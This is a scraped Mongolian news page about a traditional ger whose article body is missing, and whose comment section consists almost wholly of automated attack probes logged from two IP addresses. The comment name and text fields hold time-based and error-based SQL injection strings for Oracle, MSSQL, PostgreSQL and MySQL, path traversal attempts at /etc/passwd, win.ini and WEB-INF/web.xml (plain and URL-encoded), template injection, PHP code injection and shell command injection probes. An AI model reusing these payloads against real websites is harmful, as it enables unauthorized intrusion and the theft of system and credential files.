“Отгоо хийц”-ийн монгол гэр

МОНГОЛ БРЭНД
montastudio@montsame.gov.mn
2022-10-15 17:59:03
Холбоотой мэдээ
Сэтгэгдлүүд
 • admin 185.234.72.114 557 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('h',6)='h
 • admin 185.234.72.114 557 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('w',0)='w
 • admin 185.234.72.114 557 өдөр

  123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('s',6)
 • admin 185.234.72.114 557 өдөр

  123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('y',0)
 • admin 185.234.72.114 557 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:6
 • admin 185.234.72.114 557 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 185.234.72.114 557 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:6'/**/
 • admin 185.234.72.114 557 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 185.234.72.114 557 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(6))::text>'0
 • ../../../../WEB-INF/web.xml;admin 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 185.234.72.114 557 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(6))>0/**/
 • ../../../../WEB-INF/web.xml 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • ../../../WEB-INF/web.xml;admin 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456"and(select*from(select+sleep(6))a/**/union/**/select+1)="
 • ../../../WEB-INF/web.xml 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • ../../WEB-INF/web.xml;admin 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456'and(select*from(select+sleep(6))a/**/union/**/select+1)='
 • admin 185.234.72.114 557 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • ../../WEB-INF/web.xml 185.234.72.114 557 өдөр

  123456
 • ../WEB-INF/web.xml;admin 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  (select*from(select+sleep(6)union/**/select+1)a)
 • ../WEB-INF/web.xml 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • WEB-INF/web.xml;admin 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456"and"a"="i
 • WEB-INF/web.xml 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456"and"p"="p
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456'and'n'='f
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456'and'f'='f
 • ../../../../../../Windows/win.iniadmin 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456/**/and+3=6
 • ./../../../../../../Windows/win.ini 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456/**/and+1=1
 • ../../../../../../Windows/win.ini 185.234.72.114 557 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 185.234.72.114 557 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 557 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 557 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 185.234.72.114 557 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 185.234.72.114 557 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 557 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 557 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 185.234.72.114 557 өдөр

  123456
 • admin'"\( 185.234.72.114 557 өдөр

  123456
 • admin鎈'"\( 185.234.72.114 557 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1317783168')))>'0 185.234.72.114 557 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 557 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1712159194'))) 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  expr 971842272 + 971291934
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('w',6)='w 185.234.72.114 557 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 557 өдөр

  123456
 • admin/**/and/**/cast(md5('1872433990')as/**/int)>0 185.234.72.114 557 өдөр

  123456
 • <%- 991116125+860843008 %> 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456&set /A 959506693+809396602
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',0)='l 185.234.72.114 557 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 557 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1298393991)as/**/int))>'0 185.234.72.114 557 өдөр

  123456
 • #set($c=846517080+995882411)${c}$c 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456$(expr 867261125 + 857402180)
 • %u2215etc%u2215passwd 185.234.72.114 557 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:6 185.234.72.114 557 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1713776509))) 185.234.72.114 557 өдөр

  123456
 • ${(962204782+934121094)?c} 185.234.72.114 557 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456|expr 831221038 + 869745849
 • %2fetc%2fpasswd 185.234.72.114 557 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1894240443)))and" 185.234.72.114 557 өдөр

  123456
 • ${946134750+843329417} 185.234.72.114 557 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(6))::text>'0 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456 expr 822707674 + 976720322
 • /etc/passwdadmin 185.234.72.114 557 өдөр

  123456
 • /*1*/{{875067231+836491134}} 185.234.72.114 557 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1241941140)))and' 185.234.72.114 557 өдөр

  123456
 • /etc/passwd 185.234.72.114 557 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  <%- 875429830+918040895 %>
 • admin 185.234.72.114 557 өдөр

  123456'"\(
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 185.234.72.114 557 өдөр

  123456
 • admin"and(select*from(select+sleep(6))a/**/union/**/select+1)=" 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  #set($c=881426983+936990718)${c}$c
 • admin 185.234.72.114 557 өдөр

  123456鎈'"\(
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 185.234.72.114 557 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  ${(967301233+917271535)?c}
 • ./../../../../../../etc/passwd 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1763200269')))>'0
 • admin'and(select*from(select+sleep(6))a/**/union/**/select+1)=' 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  ${827868705+805508005}
 • ../../../../../../etc/passwdadmin 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1898153983')))
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  /*1*/{{971208050+993280643}}
 • ../../../../../../etc/passwd 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456/**/and/**/cast(md5('1699371423')as/**/int)>0
 • admin 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456'and(select'1'from/**/cast(md5(1321512790)as/**/int))>'0
 • admin 185.234.72.114 557 өдөр

  123456
 • admin"and"o"="c 185.234.72.114 557 өдөр

  123456
 • '-var_dump(md5(738155669))-' 185.234.72.114 557 өдөр

  123456
 • admin"and"a"="a 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  extractvalue(1,concat(char(126),md5(1932385653)))
 • ${@var_dump(md5(805851724))}; 185.234.72.114 557 өдөр

  123456
 • admin'and'z'='d 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1352705498)))and"
 • expr 985909556 + 832337953 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  '-var_dump(md5(132781525))-'
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1909878803)))and'
 • admin'and'p'='p 185.234.72.114 557 өдөр

  123456
 • admin&set /A 925808937+920487515 185.234.72.114 557 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  ${@var_dump(md5(543112141))};
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456
 • bqnpyvhfmrsmohnytfbh 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  ${938967462+898331075}
 • admin 185.234.72.114 557 өдөр

  bqnpyvhfmrsmohnytfbh
 • admin$(expr 976786599 + 966484483) 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456
 • admin|expr 972061603 + 809403393 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456
 • ${805115126+903400451} 185.234.72.114 557 өдөр

  123456
 • admin expr 829936050 + 815433499 185.234.72.114 557 өдөр

  123456
 • admin 185.234.72.114 557 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('c',15)='c 194.163.191.42 558 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('h',0)='h 194.163.191.42 558 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:15 194.163.191.42 558 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 558 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(15))::text>'0 194.163.191.42 558 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 558 өдөр

  123456
 • admin"and(select*from(select+sleep(15))a/**/union/**/select+1)=" 194.163.191.42 558 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 558 өдөр

  123456
 • admin'and(select*from(select+sleep(15))a/**/union/**/select+1)=' 194.163.191.42 558 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 558 өдөр

  123456
 • admin"and"e"="o 194.163.191.42 558 өдөр

  123456
 • admin"and"g"="g 194.163.191.42 558 өдөр

  123456
 • admin'and'z'='f 194.163.191.42 558 өдөр

  123456
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 558 өдөр

  123456
 • admin'and'd'='d 194.163.191.42 558 өдөр

  123456
 • ../../../../WEB-INF/web.xml 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('b',15)='b
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('b',0)='b
 • ../../../WEB-INF/web.xml 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('g',15)
 • ../../WEB-INF/web.xml;admin 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('p',0)
 • ../../WEB-INF/web.xml 194.163.191.42 558 өдөр

  123456
 • ../WEB-INF/web.xml;admin 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:15
 • ../WEB-INF/web.xml 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 194.163.191.42 558 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:15'/**/
 • WEB-INF/web.xml;admin 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • WEB-INF/web.xml 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(15))::text>'0
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(15))>0/**/
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • ./../../../../../../Windows/win.ini 194.163.191.42 558 өдөр

  123456
 • ../../../../../../Windows/win.ini 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456"and(select*from(select+sleep(15))a/**/union/**/select+1)="
 • admin 194.163.191.42 558 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 194.163.191.42 558 өдөр

  123456'and(select*from(select+sleep(15))a/**/union/**/select+1)='
 • admin 194.163.191.42 558 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 194.163.191.42 558 өдөр

  (select*from(select+sleep(15)union/**/select+1)a)
 • admin'"\( 194.163.191.42 558 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin鎈'"\( 194.163.191.42 558 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456"and"i"="d
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1216794761')))>'0 194.163.191.42 558 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456"and"s"="s
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1239559473'))) 194.163.191.42 558 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456'and'n'='w
 • admin/**/and/**/cast(md5('1797755702')as/**/int)>0 194.163.191.42 558 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456'and'q'='q
 • admin'and(select'1'from/**/cast(md5(1647923543)as/**/int))>'0 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456/**/and+3=5
 • extractvalue(1,concat(char(126),md5(1021412325))) 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456/**/and+1=1
 • admin"and/**/extractvalue(1,concat(char(126),md5(1589400781)))and" 194.163.191.42 558 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 558 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1580466155)))and' 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456'"\(
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 558 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456鎈'"\(
 • admin 194.163.191.42 558 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1469735411')))>'0
 • admin 194.163.191.42 558 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1628491766')))
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456/**/and/**/cast(md5('1189757597')as/**/int)>0
 • admin 194.163.191.42 558 өдөр

  123456'and(select'1'from/**/cast(md5(1447980993)as/**/int))>'0
 • admin 194.163.191.42 558 өдөр

  extractvalue(1,concat(char(126),md5(1357869153)))
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 558 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1523841928)))and"
 • %u2215etc%u2215passwd 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1711570308)))and'
 • %2fetc%2fpasswd 194.163.191.42 558 өдөр

  123456
 • expr 999161185 + 961559742 194.163.191.42 558 өдөр

  123456
 • /etc/passwdadmin 194.163.191.42 558 өдөр

  123456
 • admin&set /A 949901348+840043413 194.163.191.42 558 өдөр

  123456
 • admin$(expr 860719127 + 968183782) 194.163.191.42 558 өдөр

  123456
 • /etc/passwd 194.163.191.42 558 өдөр

  123456
 • admin|expr 978016555 + 934943003 194.163.191.42 558 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 558 өдөр

  123456
 • <%- 913552440+981442345 %> 194.163.191.42 558 өдөр

  123456
 • #set($c=851691217+938355934)${c}$c 194.163.191.42 558 өдөр

  123456
 • ${(968960105+928368754)?c} 194.163.191.42 558 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 558 өдөр

  123456
 • admin expr 886605194 + 998887484 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456
 • '-var_dump(md5(931461715))-' 194.163.191.42 558 өдөр

  123456
 • ./../../../../../../etc/passwd 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  expr 937803736 + 874733928
 • ${933530826+928174871} 194.163.191.42 558 өдөр

  123456
 • /*1*/{{969970528+953077861}} 194.163.191.42 558 өдөр

  123456
 • ../../../../../../etc/passwdadmin 194.163.191.42 558 өдөр

  123456
 • ${@var_dump(md5(247781986))}; 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  '-var_dump(md5(423147572))-'
 • ../../../../../../etc/passwd 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  <%- 850779234+821298863 %>
 • admin 194.163.191.42 558 өдөр

  #set($c=927694907+927612831)${c}$c
 • admin 194.163.191.42 558 өдөр

  ${(825970904+899370852)?c}
 • admin 194.163.191.42 558 өдөр

  ${@var_dump(md5(722563312))};
 • admin 194.163.191.42 558 өдөр

  123456&set /A 976942329+914326805
 • admin 194.163.191.42 558 өдөр

  ${944609983+834982992}
 • admin 194.163.191.42 558 өдөр

  123456$(expr 813563374 + 870122488)
 • admin 194.163.191.42 558 өдөр

  vigacqzuqhexhpjijkvw
 • admin 194.163.191.42 558 өдөр

  /*1*/{{816533599+946254148}}
 • admin 194.163.191.42 558 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 558 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456|expr 997272630 + 865757875
 • ${804433130+865649892} 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456 expr 801262811 + 851304299
 • admin 194.163.191.42 558 өдөр

  ${962666247+949260662}
 • vigacqzuqhexhpjijkvw 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456
 • admin 194.163.191.42 558 өдөр

  123456
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 592 өдөр

  123456
 • ../../../../WEB-INF/web.xml 194.163.191.42 592 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 592 өдөр

  123456
 • ../../../WEB-INF/web.xml 194.163.191.42 592 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 194.163.191.42 592 өдөр

  123456
 • ../../WEB-INF/web.xml 194.163.191.42 592 өдөр

  123456
 • ../WEB-INF/web.xml;admin 194.163.191.42 592 өдөр

  123456
 • ../WEB-INF/web.xml 194.163.191.42 592 өдөр

  123456
 • WEB-INF/web.xml;admin 194.163.191.42 592 өдөр

  123456
 • WEB-INF/web.xml 194.163.191.42 592 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 592 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 592 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 592 өдөр

  123456
 • ./../../../../../../Windows/win.ini 194.163.191.42 592 өдөр

  123456
 • ../../../../../../Windows/win.ini 194.163.191.42 592 өдөр

  123456
 • admin 194.163.191.42 592 өдөр

  123456'"\(
 • admin 194.163.191.42 592 өдөр

  123456鎈'"\(
 • admin 194.163.191.42 592 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1334914460')))>'0
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 592 өдөр

  123456
 • admin 194.163.191.42 592 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1721914517')))
 • admin 194.163.191.42 592 өдөр

  123456/**/and/**/cast(md5('1644992248')as/**/int)>0
 • admin 194.163.191.42 592 өдөр

  123456'and(select'1'from/**/cast(md5(1682451301)as/**/int))>'0
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 592 өдөр

  123456
 • admin 194.163.191.42 592 өдөр

  extractvalue(1,concat(char(126),md5(1809669062)))
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 592 өдөр

  123456
 • admin 194.163.191.42 592 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1724891402)))and"
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 592 өдөр

  123456
 • admin 194.163.191.42 592 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1352708893)))and'
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 592 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 592 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 592 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 592 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 592 өдөр

  123456
 • admin 194.163.191.42 592 өдөр

  expr 907744006 + 866605594
 • #set($c=999234727+965348808)${c}$c 194.163.191.42 592 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 592 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 592 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 592 өдөр

  123456
 • admin 194.163.191.42 592 өдөр

  123456&set /A 900218463+974790455
 • %2fetc%2fpasswd 194.163.191.42 592 өдөр

  123456
 • /etc/passwdadmin 194.163.191.42 592 өдөр

  123456
 • admin 194.163.191.42 592 өдөр

  123456$(expr 883123476 + 856360670)
 • ${(953255313+858597271)?c} 194.163.191.42 592 өдөр

  123456
 • admin 194.163.191.42 592 өдөр

  123456|expr 985891988 + 910564186
 • ${964356376+903817401} 194.163.191.42 592 өдөр

  123456
 • /etc/passwd 194.163.191.42 592 өдөр

  123456
 • admin 194.163.191.42 592 өдөр

  123456 expr 886672263 + 832971071
 • /*1*/{{842573802+812984425}} 194.163.191.42 592 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 592 өдөр

  123456
 • admin'"\( 194.163.191.42 592 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 592 өдөр

  123456
 • admin 194.163.191.42 592 өдөр

  <%- 824265507+926398492 %>
 • admin鎈'"\( 194.163.191.42 592 өдөр

  123456
 • ./../../../../../../etc/passwd 194.163.191.42 592 өдөр

  123456
 • admin 194.163.191.42 592 өдөр

  #set($c=895052105+804331516)${c}$c
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1267168383')))>'0 194.163.191.42 592 өдөр

  123456
 • ../../../../../../etc/passwdadmin 194.163.191.42 592 өдөр

  123456
 • admin 194.163.191.42 592 өдөр

  ${(997608125+807921797)?c}
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1023511464'))) 194.163.191.42 592 өдөр

  123456
 • ../../../../../../etc/passwd 194.163.191.42 592 өдөр

  123456
 • admin 194.163.191.42 592 өдөр

  ${880396329+976335152}
 • admin/**/and/**/cast(md5('1284632794')as/**/int)>0 194.163.191.42 592 өдөр

  123456
 • admin 194.163.191.42 592 өдөр

  /*1*/{{877145238+867411231}}
 • admin 194.163.191.42 592 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1306059295)as/**/int))>'0 194.163.191.42 592 өдөр

  123456
